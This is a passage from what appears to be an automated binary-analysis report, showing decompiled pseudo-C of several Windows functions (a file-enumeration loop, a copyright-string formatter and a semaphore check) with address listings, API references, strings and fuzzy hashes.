															_t297 = _v1112;
															__eflags = _t297;
															if(_t297 == 0) {
																_t297 =  &_v1632;
															}
															_t298 = E011F916C(_t360, _v1660, _v1656, _t297, _t422);
															__eflags =  *0x11fd560;
															_t360 = _v1684;
															if( *0x11fd560 != 0) {
																_t299 = E011E0178(_t298);
																__eflags = _t299;
																if(_t299 != 0) {
																	_t360 = _v1672;
																} else {
																	_t410 = _v1112;
																	__eflags = _v1112;
																	if(__eflags == 0) {
																		_t410 =  &_v1632;
																	}
																	_t300 = E011F84FE(_t299, _t410, __eflags, _v1656, _v1660, _v1644);
																	__eflags = _t300 - _t316;
																	if(_t300 == _t316) {
																		E011DCD27(_v1664);
																		E011DDB92(_t422);
																		_t352 = _v1668;
																		goto L129;
																	}
																	_t360 = _v1668;
																	_v1672 = _v1668;
																}
															}
														}
														__eflags =  *0x11fd5cc;
														if( *0x11fd5cc == 0) {
															goto L69;
														}
													}
													L84:
													__eflags = 0;
													 *0x11fd5cc = 0;
													E011DDB92(_t422);
													_t421 = _v1648;
												} else {
													_t305 = E011F8E52(_t421, _v1660, _v1652);
													_v1680 = _t305;
													_v1676 = _t305;
												}
												_t416 = _t421[8];
												_t263 = 0;
												 *0x11fd564 = 0;
												__eflags = _t416;
												if(_t416 != 0) {
													do {
														_t265 =  *(_t416 + 0x1c);
														__eflags = _t265 & 0x00000004;
														if((_t265 & 0x00000004) != 0) {
															_t290 = _t265 & 0xfffffffb | 0x00000002;
															__eflags = _t290;
															 *(_t416 + 0x1c) = _t290;
														}
														_t363 = _v576;
														__eflags = _v576;
														if(_v576 == 0) {
															_t363 =  &_v1096;
														}
														_t266 = E011D5400(_t363, _v568,  *_t416, _t421[1]);
														__eflags = _t266;
														if(_t266 == 0) {
															_t267 = _v576;
															__eflags = _t267;
															if(_t267 == 0) {
																_t267 =  &_v1096;
															}
															_push(_t267);
															E011E25D9(L"%s\r\n");
														} else {
															_push(0);
															_push(_t266);
															E011DC108(0);
														}
														_t366 = _v576;
														__eflags = _v576;
														if(_v576 == 0) {
															_t366 =  &_v1096;
														}
														_t269 = E011DAD44(_t366);
														__eflags = _t269;
														if(_t269 != 0) {
															_t401 = _v1112;
															__eflags = _v1112;
															if(_v1112 == 0) {
																_t401 =  &_v1632;
															}
															_t367 = _v576;
															__eflags = _v576;
															if(_v576 == 0) {
																_t367 =  &_v1096;
															}
															_t270 = E011F8F66(_t367, _t401);
															__eflags = _t270;
															if(_t270 == 0) {
																_t368 = _v576;
																__eflags = _t368;
																if(_t368 == 0) {
																	_t368 =  &_v1096;
																}
																_t422 = E011D5DB5(_t368, 0, _t368, _t368);
																__eflags = _t422 - 0xffffffff;
																if(_t422 == 0xffffffff) {
																	E011DCD27(_v1664);
																	_t357 = _v1672;
																	goto L134;
																}
																_t273 = E011E0178(_t271);
																__eflags = _t273;
																if(_t273 == 0) {
																	L120:
																	_t371 = _v1652;
																} else {
																	_t371 = 0x80;
																	_v1652 = 0x80;
																}
																__eflags =  *0x11fd5cc;
																if( *0x11fd5cc == 0) {
																	_t274 = _v1112;
																	__eflags = _t274;
																	if(_t274 == 0) {
																		_t274 =  &_v1632;
																	}
																	_t276 = E011D5712(_t422, _v1660, _t371,  &_v1656, _t416, _v1672, _t274);
																	__eflags = _t276;
																	if(_t276 != 0) {
																		_t279 = _v1112;
																		__eflags = _t279;
																		if(_t279 == 0) {
																			_t279 =  &_v1632;
																		}
																		_t280 = E011F916C(_v1672, _v1660, _v1656, _t279, _t422);
																		__eflags =  *0x11fd560;
																		if( *0x11fd560 != 0) {
																			_t281 = E011E0178(_t280);
																			__eflags = _t281;
																			if(_t281 == 0) {
																				_t405 = _v1112;
																				__eflags = _v1112;
																				if(__eflags == 0) {
																					_t405 =  &_v1632;
																				}
																				_t282 = E011F84FE(_t281, _t405, __eflags, _v1656, _v1660, _v1644);
																				__eflags = _t282 - _t316;
																				if(_t282 == _t316) {
																					E011DCD27(_v1664);
																					E011DDB92(_t422);
																					_t352 = _v1668;
																					goto L129;
																				}
																				_v1672 = _v1668;
																			}
																		}
																		goto L120;
																	}
																}
																__eflags = 0;
																 *0x11fd5cc = 0;
																E011DDB92(_t422);
																_t421 = _v1648;
															} else {
																_push(0);
																_push(0x2340);
																E011DC108(_t367);
															}
														}
														_t416 =  *(_t416 + 0x20);
														__eflags = _t416;
													} while (_t416 != 0);
													_t263 = 0;
													__eflags = 0;
												}
												_t413 = _v1672;
												E011D56AE(_t421, _v1640, _v1672, _t263);
											}
											_t391 = _t421[6];
											_t242 = E011E6A1C(E011E6A00, _t421[6], 0x21, _v1664);
											__eflags = _t242;
											if(_t242 != 0) {
												continue;
											} else {
												E011DCD27(_v1664);
												__imp__??_V@YAXPAX@Z(_v576);
												__imp__??_V@YAXPAX@Z(_v40);
												__imp__??_V@YAXPAX@Z(_v1112);
												_t218 = 0;
											}
										}
									}
									goto L142;
								}
								_t214 = E011DCD27(_v1664);
							}
							goto L141;
						}
					}
				}
				L142:
				_pop(_t414);
				_pop(_t420);
				_pop(_t317);
				return E011E6FD0(_t218, _t317, _v20 ^ _t431, _t391, _t414, _t420);
			}




































































































                                                    0x011f85e9
                                                    0x011f85e9
                                                    0x011f85ec
                                                    0x011f85f0
                                                    0x011f85f2
                                                    0x011f85f4
                                                    0x011f85f5
                                                    0x011f85fb
                                                    0x011f85fb
                                                    0x011f85ff
                                                    0x011f8607
                                                    0x011f8617
                                                    0x011f8624
                                                    0x011f8629
                                                    0x011f8629
                                                    0x011f8633
                                                    0x011f8649
                                                    0x011f8649
                                                    0x011f864e
                                                    0x011f8654
                                                    0x00000000
                                                    0x00000000
                                                    0x011f8640
                                                    0x011f8644
                                                    0x011f8644
                                                    0x011f865d
                                                    0x011f8663
                                                    0x011f866c
                                                    0x011f8672
                                                    0x011f8679
                                                    0x011f8681
                                                    0x011f8682
                                                    0x011f8688
                                                    0x011f868d
                                                    0x011f868f
                                                    0x011f869e
                                                    0x011f86a3
                                                    0x011f86a4
                                                    0x011f86ac
                                                    0x011f86af
                                                    0x011f86b6
                                                    0x011f86be
                                                    0x011f86cc
                                                    0x011f86d3
                                                    0x011f86e4
                                                    0x011f86ec
                                                    0x011f86fa
                                                    0x011f8701
                                                    0x011f8712
                                                    0x011f871d
                                                    0x011f873d
                                                    0x011f8e1a
                                                    0x011f8e36
                                                    0x011f8e3b
                                                    0x011f879b
                                                    0x011f87a8
                                                    0x011f87ad
                                                    0x011f87b3
                                                    0x00000000
                                                    0x011f87b9
                                                    0x011f87c0
                                                    0x011f87f3
                                                    0x00000000
                                                    0x011f87c2
                                                    0x011f87ce
                                                    0x011f87d2
                                                    0x011f87d7
                                                    0x011f87dd
                                                    0x011f87eb
                                                    0x011f87ed
                                                    0x011f87f7
                                                    0x011f87f7
                                                    0x011f87f7
                                                    0x011f87fb
                                                    0x011f87fe
                                                    0x011f8802
                                                    0x011f8804
                                                    0x011f880b
                                                    0x00000000
                                                    0x00000000
                                                    0x011f880d
                                                    0x011f8810
                                                    0x011f8816
                                                    0x00000000
                                                    0x011f8818
                                                    0x011f8818
                                                    0x00000000
                                                    0x011f8818
                                                    0x00000000
                                                    0x011f8816
                                                    0x011f881f
                                                    0x011f8829
                                                    0x011f8833
                                                    0x011f8838
                                                    0x011f8838
                                                    0x011f883f
                                                    0x011f8842
                                                    0x011f8844
                                                    0x011f8849
                                                    0x011f8849
                                                    0x011f884c
                                                    0x011f884c
                                                    0x011f884f
                                                    0x011f8856
                                                    0x00000000
                                                    0x00000000
                                                    0x011f885c
                                                    0x011f8863
                                                    0x011f8865
                                                    0x011f8867
                                                    0x011f8867
                                                    0x011f8877
                                                    0x011f887c
                                                    0x011f887e
                                                    0x00000000
                                                    0x011f8884
                                                    0x011f8884
                                                    0x011f888c
                                                    0x011f8891
                                                    0x011f889a
                                                    0x011f889c
                                                    0x011f889e
                                                    0x011f889e
                                                    0x011f88a2
                                                    0x011f88b2
                                                    0x011f88b7
                                                    0x011f88b9
                                                    0x00000000
                                                    0x011f88bf
                                                    0x011f88bf
                                                    0x011f88c6
                                                    0x011f88c8
                                                    0x011f88ca
                                                    0x011f88cc
                                                    0x011f88cc
                                                    0x011f88d2
                                                    0x011f88d5
                                                    0x011f88db
                                                    0x011f88dd
                                                    0x011f88df
                                                    0x011f88df
                                                    0x011f88e6
                                                    0x011f88eb
                                                    0x011f88ee
                                                    0x011f88f0
                                                    0x011f8921
                                                    0x011f8923
                                                    0x011f8926
                                                    0x011f8e0a
                                                    0x011f8de9
                                                    0x011f8deb
                                                    0x011f8dec
                                                    0x011f8da2
                                                    0x011f8da4
                                                    0x011f8da6
                                                    0x011f8dab
                                                    0x011f8daf
                                                    0x011f8db6
                                                    0x011f8dbb
                                                    0x011f8d9d
                                                    0x011f8d9d
                                                    0x00000000
                                                    0x011f8d9d
                                                    0x011f892e
                                                    0x011f8933
                                                    0x011f8935
                                                    0x011f8942
                                                    0x011f8937
                                                    0x011f8937
                                                    0x011f893c
                                                    0x011f893c
                                                    0x011f8946
                                                    0x011f894d
                                                    0x011f894f
                                                    0x011f8951
                                                    0x011f8951
                                                    0x011f895b
                                                    0x011f8968
                                                    0x011f896d
                                                    0x011f8974
                                                    0x011f8978
                                                    0x011f8e00
                                                    0x011f8df7
                                                    0x011f8df7
                                                    0x011f8dfc
                                                    0x011f8de4
                                                    0x011f8de4
                                                    0x00000000
                                                    0x011f8de4
                                                    0x011f897e
                                                    0x011f8985
                                                    0x011f8987
                                                    0x011f8989
                                                    0x011f8989
                                                    0x011f898e
                                                    0x011f8994
                                                    0x011f899b
                                                    0x011f899d
                                                    0x011f89d2
                                                    0x011f89d4
                                                    0x011f89d6
                                                    0x011f89d6
                                                    0x011f89e3
                                                    0x011f89e5
                                                    0x011f89e9
                                                    0x011f899f
                                                    0x011f899f
                                                    0x011f89a1
                                                    0x011f89a3
                                                    0x011f89a3
                                                    0x011f89a7
                                                    0x011f89ac
                                                    0x011f89b0
                                                    0x011f89b4
                                                    0x011f89b7
                                                    0x011f8df3
                                                    0x011f8df3
                                                    0x00000000
                                                    0x011f8df3
                                                    0x011f89be
                                                    0x011f89c6
                                                    0x011f89cc
                                                    0x011f89cc
                                                    0x011f89ed
                                                    0x011f89f0
                                                    0x00000000
                                                    0x00000000
                                                    0x011f89f6
                                                    0x011f89fd
                                                    0x011f8a85
                                                    0x011f8a85
                                                    0x011f8a8f
                                                    0x011f8a8f
                                                    0x011f8a91
                                                    0x00000000
                                                    0x00000000
                                                    0x011f8a97
                                                    0x011f8a9e
                                                    0x011f8aa0
                                                    0x011f8aa2
                                                    0x011f8aa2
                                                    0x011f8ab0
                                                    0x011f8ab5
                                                    0x011f8abc
                                                    0x011f8ac0
                                                    0x011f8ac2
                                                    0x011f8ac7
                                                    0x011f8ac9
                                                    0x011f8b01
                                                    0x011f8acb
                                                    0x011f8acb
                                                    0x011f8ad2
                                                    0x011f8ad4
                                                    0x011f8ad6
                                                    0x011f8ad6
                                                    0x011f8aea
                                                    0x011f8aef
                                                    0x011f8af1
                                                    0x00000000
                                                    0x00000000
                                                    0x011f8af7
                                                    0x011f8afb
                                                    0x011f8afb
                                                    0x011f8ac9
                                                    0x011f8b05
                                                    0x011f8b0c
                                                    0x011f8b0e
                                                    0x011f8b10
                                                    0x011f8b10
                                                    0x011f8b26
                                                    0x011f8b2b
                                                    0x011f8b32
                                                    0x011f8a8b
                                                    0x00000000
                                                    0x011f8a8b
                                                    0x00000000
                                                    0x011f8b32
                                                    0x011f8a03
                                                    0x011f8a03
                                                    0x011f8a08
                                                    0x011f8a0a
                                                    0x011f8a11
                                                    0x011f8a13
                                                    0x011f8a15
                                                    0x011f8a15
                                                    0x011f8a23
                                                    0x011f8a28
                                                    0x011f8a2f
                                                    0x011f8a33
                                                    0x011f8a35
                                                    0x011f8a3a
                                                    0x011f8a3c
                                                    0x011f8a74
                                                    0x011f8a3e
                                                    0x011f8a3e
                                                    0x011f8a45
                                                    0x011f8a47
                                                    0x011f8a49
                                                    0x011f8a49
                                                    0x011f8a5d
                                                    0x011f8a62
                                                    0x011f8a64
                                                    0x011f8d8d
                                                    0x011f8d94
                                                    0x011f8d99
                                                    0x00000000
                                                    0x011f8d99
                                                    0x011f8a6a
                                                    0x011f8a6e
                                                    0x011f8a6e
                                                    0x011f8a3c
                                                    0x011f8a33
                                                    0x011f8a78
                                                    0x011f8a7f
                                                    0x00000000
                                                    0x00000000
                                                    0x011f8a7f
                                                    0x011f8b38
                                                    0x011f8b38
                                                    0x011f8b3c
                                                    0x011f8b41
                                                    0x011f8b46
                                                    0x011f88f2
                                                    0x011f88fc
                                                    0x011f8901
                                                    0x011f8905
                                                    0x011f8905
                                                    0x011f8b4a
                                                    0x011f8b4d
                                                    0x011f8b4f
                                                    0x011f8b54
                                                    0x011f8b56
                                                    0x011f8b5c
                                                    0x011f8b5c
                                                    0x011f8b5f
                                                    0x011f8b61
                                                    0x011f8b66
                                                    0x011f8b66
                                                    0x011f8b69
                                                    0x011f8b69
                                                    0x011f8b6c
                                                    0x011f8b73
                                                    0x011f8b75
                                                    0x011f8b77
                                                    0x011f8b77
                                                    0x011f8b8a
                                                    0x011f8b8f
                                                    0x011f8b91
                                                    0x011f8b9e
                                                    0x011f8ba5
                                                    0x011f8ba7
                                                    0x011f8ba9
                                                    0x011f8ba9
                                                    0x011f8bb0
                                                    0x011f8bb6
                                                    0x011f8b93
                                                    0x011f8b95
                                                    0x011f8b96
                                                    0x011f8b97
                                                    0x011f8b97
                                                    0x011f8bbd
                                                    0x011f8bc4
                                                    0x011f8bc6
                                                    0x011f8bc8
                                                    0x011f8bc8
                                                    0x011f8bcf
                                                    0x011f8bd4
                                                    0x011f8bd6
                                                    0x011f8bdc
                                                    0x011f8be3
                                                    0x011f8be5
                                                    0x011f8be7
                                                    0x011f8be7
                                                    0x011f8beb
                                                    0x011f8bf2
                                                    0x011f8bf4
                                                    0x011f8bf6
                                                    0x011f8bf6
                                                    0x011f8bfd
                                                    0x011f8c02
                                                    0x011f8c04
                                                    0x011f8c1a
                                                    0x011f8c21
                                                    0x011f8c23
                                                    0x011f8c25
                                                    0x011f8c25
                                                    0x011f8c35
                                                    0x011f8c37
                                                    0x011f8c3a
                                                    0x011f8ddb
                                                    0x011f8de0
                                                    0x00000000
                                                    0x011f8de0
                                                    0x011f8c42
                                                    0x011f8c47
                                                    0x011f8c49
                                                    0x011f8cf3
                                                    0x011f8cf3
                                                    0x011f8c4f
                                                    0x011f8c4f
                                                    0x011f8c54
                                                    0x011f8c54
                                                    0x011f8cf7
                                                    0x011f8cfe
                                                    0x011f8c5d
                                                    0x011f8c64
                                                    0x011f8c66
                                                    0x011f8c68
                                                    0x011f8c68
                                                    0x011f8c7e
                                                    0x011f8c83
                                                    0x011f8c85
                                                    0x011f8c87
                                                    0x011f8c8e
                                                    0x011f8c90
                                                    0x011f8c92
                                                    0x011f8c92
                                                    0x011f8ca4
                                                    0x011f8ca9
                                                    0x011f8cb0
                                                    0x011f8cb6
                                                    0x011f8cbb
                                                    0x011f8cbd
                                                    0x011f8cbf
                                                    0x011f8cc6
                                                    0x011f8cc8
                                                    0x011f8cca
                                                    0x011f8cca
                                                    0x011f8cde
                                                    0x011f8ce3
                                                    0x011f8ce5
                                                    0x011f8dc5
                                                    0x011f8dcc
                                                    0x011f8dd1
                                                    0x00000000
                                                    0x011f8dd1
                                                    0x011f8cef
                                                    0x011f8cef
                                                    0x011f8cbd
                                                    0x00000000
                                                    0x011f8cb0
                                                    0x011f8c85
                                                    0x011f8d04
                                                    0x011f8d08
                                                    0x011f8d0d
                                                    0x011f8d12
                                                    0x011f8c06
                                                    0x011f8c08
                                                    0x011f8c09
                                                    0x011f8c0e
                                                    0x011f8c14
                                                    0x011f8c04
                                                    0x011f8d16
                                                    0x011f8d19
                                                    0x011f8d19
                                                    0x011f8d21
                                                    0x011f8d21
                                                    0x011f8d21
                                                    0x011f8d23
                                                    0x011f8d2f
                                                    0x011f8d2f
                                                    0x011f8d38
                                                    0x011f8d42
                                                    0x011f8d47
                                                    0x011f8d49
                                                    0x00000000
                                                    0x011f8d4f
                                                    0x011f8d53
                                                    0x011f8d5f
                                                    0x011f8d6d
                                                    0x011f8d7b
                                                    0x011f8d82
                                                    0x011f8d82
                                                    0x011f8d49
                                                    0x011f88b9
                                                    0x00000000
                                                    0x011f887e
                                                    0x011f8e15
                                                    0x011f8e15
                                                    0x00000000
                                                    0x011f87dd
                                                    0x011f87c0
                                                    0x011f87b3
                                                    0x011f8e3d
                                                    0x011f8e44
                                                    0x011f8e45
                                                    0x011f8e46
                                                    0x011f8e51

                                                    APIs
                                                    • longjmp.MSVCRT(0120B8F8,00000001,00000000,011F8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 011F865D
                                                    • memset.MSVCRT ref: 011F86B6
                                                    • memset.MSVCRT ref: 011F86E4
                                                    • memset.MSVCRT ref: 011F8712
                                                      • Part of subcall function 011DCD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,011F9362,00000000,00000000,?,011E9814,00000000), ref: 011DCD55
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                      • Part of subcall function 011D585F: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,0000FE00,00001000,00000004,00000000,?,00000001,?,011F87AD,?,00000000,-00000105,-00000105,-00000105), ref: 011D5875
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$AllocCloseFindVirtuallongjmp
                                                    • String ID: %9d
                                                    • API String ID: 973120493-2241623522
                                                    • Opcode ID: af42e88ca2e9f14b4f30493f72a61aec06a2a1af03033cb19f9ae5cdeb0f0d5c
                                                    • Instruction ID: 07a11b7b33a58720572a15f09c5808ba03a2de520c30c490bd93c67c36ebebe5
                                                    • Opcode Fuzzy Hash: af42e88ca2e9f14b4f30493f72a61aec06a2a1af03033cb19f9ae5cdeb0f0d5c
                                                    • Instruction Fuzzy Hash: CD51F8B1A087819BD32CDF74D8856AF7BE9EB94318F04092EF689D3240EB74D940CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F6456, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 125memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E011F6456(void* __eflags) {
				signed int _v8;
				char _v68;
				void* _v72;
				signed int _v76;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t28;
				signed int _t30;
				void _t31;
				signed int _t36;
				void* _t38;
				short _t39;
				short _t40;
				signed int _t41;
				signed int _t43;
				signed int _t44;
				void* _t46;
				signed int _t47;
				signed int _t49;
				void* _t53;
				signed int _t56;
				short* _t57;
				signed int _t58;
				void* _t59;
				void* _t60;
				signed int _t61;
				signed int _t65;
				void* _t66;
				signed int _t70;

				_t21 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t21 ^ _t70;
				_t49 = 0xe;
				_t67 = "Copyright (c) Microsoft Corporation. All rights reserved.";
				memcpy( &_v68, "Copyright (c) Microsoft Corporation. All rights reserved.", _t49 << 2);
				asm("movsw");
				_t65 = 0;
				_t47 = 0;
				if(E011E7735(0) == 0) {
					if(RtlCreateUnicodeStringFromAsciiz( &_v84,  &_v68) == 0) {
						goto L26;
					} else {
						_t67 = _v80;
						_v72 = _t67;
						goto L4;
					}
				} else {
					_t46 =  *0x121c000(L"%WINDOWS_COPYRIGHT%");
					_t67 = _t46;
					_v72 = _t46;
					L4:
					if(_t67 == 0) {
						L26:
						_t28 = 0;
					} else {
						_t30 =  *_t67 & 0x0000ffff;
						_t60 = _t67;
						if(_t30 != 0) {
							_t58 = _t30;
							do {
								if(_t58 == 0xae || _t58 == 0xa9) {
									_t43 = 1;
								} else {
									_t43 = _t65;
								}
								_t60 = _t60 + 2;
								_t47 = _t47 + _t43;
								_t44 =  *_t60 & 0x0000ffff;
								_t58 = _t44;
							} while (_t44 != 0);
							_t67 = _v72;
						}
						_t53 = _t67;
						_t59 = _t53 + 2;
						do {
							_t31 =  *_t53;
							_t53 = _t53 + 2;
						} while (_t31 != _t65);
						_t47 = GlobalAlloc(0x40, 2 + ((_t53 - _t59 >> 1) + _t47 * 2) * 2);
						_v76 = _t47;
						if(_t47 != 0) {
							_t36 =  *_t67 & 0x0000ffff;
							_t66 = _t67;
							_t56 = _t47;
							if(_t36 != 0) {
								_t61 = _t36;
								do {
									if(_t61 == 0xae || _t61 == 0xa9) {
										_t38 = 0x28;
										 *_t56 = _t38;
										_t39 = 0x63;
										 *((short*)(_t56 + 2)) = _t39;
										_t57 = _t56 + 4;
										_t40 = 0x29;
										 *_t57 = _t40;
									} else {
										 *_t56 = _t61;
									}
									_t66 = _t66 + 2;
									_t56 = _t57 + 2;
									_t41 =  *_t66 & 0x0000ffff;
									_t61 = _t41;
								} while (_t41 != 0);
								_t67 = _v72;
								_t47 = _v76;
							}
							_t65 = _t47;
							 *_t56 = 0;
						}
						GlobalFree(_t67);
						_t28 = _t65;
					}
				}
				return E011E6FD0(_t28, _t47, _v8 ^ _t70, _t59, _t65, _t67);
			}




































                                                    0x011f645e
                                                    0x011f6465
                                                    0x011f646d
                                                    0x011f646e
                                                    0x011f6476
                                                    0x011f6478
                                                    0x011f647a
                                                    0x011f647c
                                                    0x011f6485
                                                    0x011f64a9
                                                    0x00000000
                                                    0x011f64af
                                                    0x011f64af
                                                    0x011f64b2
                                                    0x00000000
                                                    0x011f64b2
                                                    0x011f6487
                                                    0x011f648c
                                                    0x011f6492
                                                    0x011f6494
                                                    0x011f64b5
                                                    0x011f64b7
                                                    0x011f6589
                                                    0x011f6589
                                                    0x011f64bd
                                                    0x011f64bd
                                                    0x011f64c0
                                                    0x011f64c5
                                                    0x011f64c7
                                                    0x011f64ce
                                                    0x011f64d1
                                                    0x011f64e3
                                                    0x011f64dd
                                                    0x011f64dd
                                                    0x011f64dd
                                                    0x011f64e4
                                                    0x011f64e7
                                                    0x011f64e9
                                                    0x011f64ec
                                                    0x011f64ee
                                                    0x011f64f3
                                                    0x011f64f3
                                                    0x011f64f6
                                                    0x011f64f8
                                                    0x011f64fb
                                                    0x011f64fb
                                                    0x011f64fe
                                                    0x011f6501
                                                    0x011f651d
                                                    0x011f651f
                                                    0x011f6524
                                                    0x011f6526
                                                    0x011f6529
                                                    0x011f652b
                                                    0x011f6530
                                                    0x011f6537
                                                    0x011f653c
                                                    0x011f653f
                                                    0x011f654d
                                                    0x011f654e
                                                    0x011f6553
                                                    0x011f6554
                                                    0x011f6558
                                                    0x011f655d
                                                    0x011f655e
                                                    0x011f6546
                                                    0x011f6546
                                                    0x011f6546
                                                    0x011f6561
                                                    0x011f6564
                                                    0x011f6567
                                                    0x011f656a
                                                    0x011f656c
                                                    0x011f6571
                                                    0x011f6574
                                                    0x011f6574
                                                    0x011f6579
                                                    0x011f657b
                                                    0x011f657b
                                                    0x011f657f
                                                    0x011f6585
                                                    0x011f6585
                                                    0x011f64b7
                                                    0x011f659b

                                                    APIs
                                                    • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 011F64A1
                                                    • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 011F6517
                                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 011F657F
                                                    Strings
                                                    • %WINDOWS_COPYRIGHT%, xrefs: 011F6487
                                                    • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 011F646E
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                    • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                    • API String ID: 1103618819-4062316587
                                                    • Opcode ID: fcdebe67506d7c5edcd2f9c8988b51216db60d79dd470bc185e1a4cce3491c86
                                                    • Instruction ID: 6b238cb15df7aefa38a59d2d1356d3b57867e851cb587cb24cbcd8520b147d85
                                                    • Opcode Fuzzy Hash: fcdebe67506d7c5edcd2f9c8988b51216db60d79dd470bc185e1a4cce3491c86
                                                    • Instruction Fuzzy Hash: D2412335A002158BDF28DFA898587BA77B2EF48740B59006DEB06EB354EB659D43C381
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F2BF0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E011F2BF0(void* __ecx, int* _a4) {
				void* _v0;
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				short* _t25;
				void* _t30;
				void* _t38;
				WCHAR* _t40;
				int* _t41;
				void* _t46;
				void* _t50;
				signed int _t52;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t59;

				_t22 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t22 ^ _t59;
				_t41 = _a4;
				 *_t41 = 0;
				_t41[1] = 0;
				E011E1040( &_v528, 0x104, __ecx);
				_t52 = 0x104;
				_t25 =  &_v528;
				while( *_t25 != 0) {
					_t25 = _t25 + 2;
					_t52 = _t52 - 1;
					if(_t52 != 0) {
						continue;
					}
					break;
				}
				asm("sbb ecx, ecx");
				_t46 =  ~_t52 & 0x00000104 - _t52;
				if(_t52 != 0) {
					_t40 =  &(( &_v528)[_t46]);
					_t58 = 0x104 - _t46;
					if(_t58 == 0) {
						L11:
						_t40 = _t40 - 2;
					} else {
						_t50 = 0x7ffffffe;
						_t52 = L"_p0" - _t40;
						while(_t50 != 0) {
							_t55 =  *(_t40 + _t52) & 0x0000ffff;
							if(_t55 == 0) {
								break;
							} else {
								 *_t40 = _t55;
								_t50 = _t50 - 1;
								_t40 =  &(_t40[1]);
								_t58 = _t58 - 1;
								if(_t58 != 0) {
									continue;
								} else {
									goto L11;
								}
							}
							goto L12;
						}
						if(_t58 == 0) {
							goto L11;
						}
					}
					L12:
					_t46 = 0;
					 *_t40 = 0;
				}
				_t57 = OpenSemaphoreW(0x1f0003, 0,  &_v528);
				_v532 = _t57;
				if(_t57 != 0) {
					_t52 =  &_v536;
					_v536 = 0;
					_t46 = _t57;
					_t30 = E011F213A(_t46, _t52);
					_t54 = _t30;
					if(_t30 >= 0) {
						asm("cdq");
						 *_t41 = _v536;
						_t41[1] = _t52;
						goto L19;
					} else {
						_t46 = _v0;
						_t52 = 0xce;
						E011F292C("wil", _t54);
						_t57 = _v532;
					}
				} else {
					if(GetLastError() == 2) {
						L19:
						_t54 = 0;
					} else {
						_t46 = _v0;
						_t52 = 0xc8;
						_t38 = E011F2913("wil");
						_t57 = _v532;
						_t54 = _t38;
					}
				}
				if(_t57 != 0 && CloseHandle(_t57) == 0) {
					_push(_t46);
					_t52 = 0x879;
					E011F2D56();
				}
				return E011E6FD0(_t54, _t41, _v8 ^ _t59, _t52, _t54, _t57);
			}
























                                                    0x011f2bfb
                                                    0x011f2c02
                                                    0x011f2c06
                                                    0x011f2c11
                                                    0x011f2c19
                                                    0x011f2c26
                                                    0x011f2c2b
                                                    0x011f2c2d
                                                    0x011f2c33
                                                    0x011f2c39
                                                    0x011f2c3c
                                                    0x011f2c3f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f2c3f
                                                    0x011f2c49
                                                    0x011f2c4b
                                                    0x011f2c4f
                                                    0x011f2c57
                                                    0x011f2c5a
                                                    0x011f2c5c
                                                    0x011f2c8f
                                                    0x011f2c8f
                                                    0x011f2c5e
                                                    0x011f2c63
                                                    0x011f2c68
                                                    0x011f2c70
                                                    0x011f2c74
                                                    0x011f2c7b
                                                    0x00000000
                                                    0x011f2c7d
                                                    0x011f2c7d
                                                    0x011f2c80
                                                    0x011f2c81
                                                    0x011f2c84
                                                    0x011f2c87
                                                    0x00000000
                                                    0x011f2c89
                                                    0x00000000
                                                    0x011f2c89
                                                    0x011f2c87
                                                    0x00000000
                                                    0x011f2c7b
                                                    0x011f2c8d
                                                    0x00000000
                                                    0x00000000
                                                    0x011f2c8d
                                                    0x011f2c92
                                                    0x011f2c92
                                                    0x011f2c94
                                                    0x011f2c94
                                                    0x011f2cab
                                                    0x011f2cad
                                                    0x011f2cb5
                                                    0x011f2cde
                                                    0x011f2ce4
                                                    0x011f2cee
                                                    0x011f2cf0
                                                    0x011f2cf5
                                                    0x011f2cf9
                                                    0x011f2d1c
                                                    0x011f2d1d
                                                    0x011f2d1f
                                                    0x00000000
                                                    0x011f2cfb
                                                    0x011f2cfb
                                                    0x011f2cfe
                                                    0x011f2d09
                                                    0x011f2d0e
                                                    0x011f2d0e
                                                    0x011f2cb7
                                                    0x011f2cc0
                                                    0x011f2d22
                                                    0x011f2d22
                                                    0x011f2cc2
                                                    0x011f2cc2
                                                    0x011f2cc5
                                                    0x011f2ccf
                                                    0x011f2cd4
                                                    0x011f2cda
                                                    0x011f2cda
                                                    0x011f2cc0
                                                    0x011f2d26
                                                    0x011f2d33
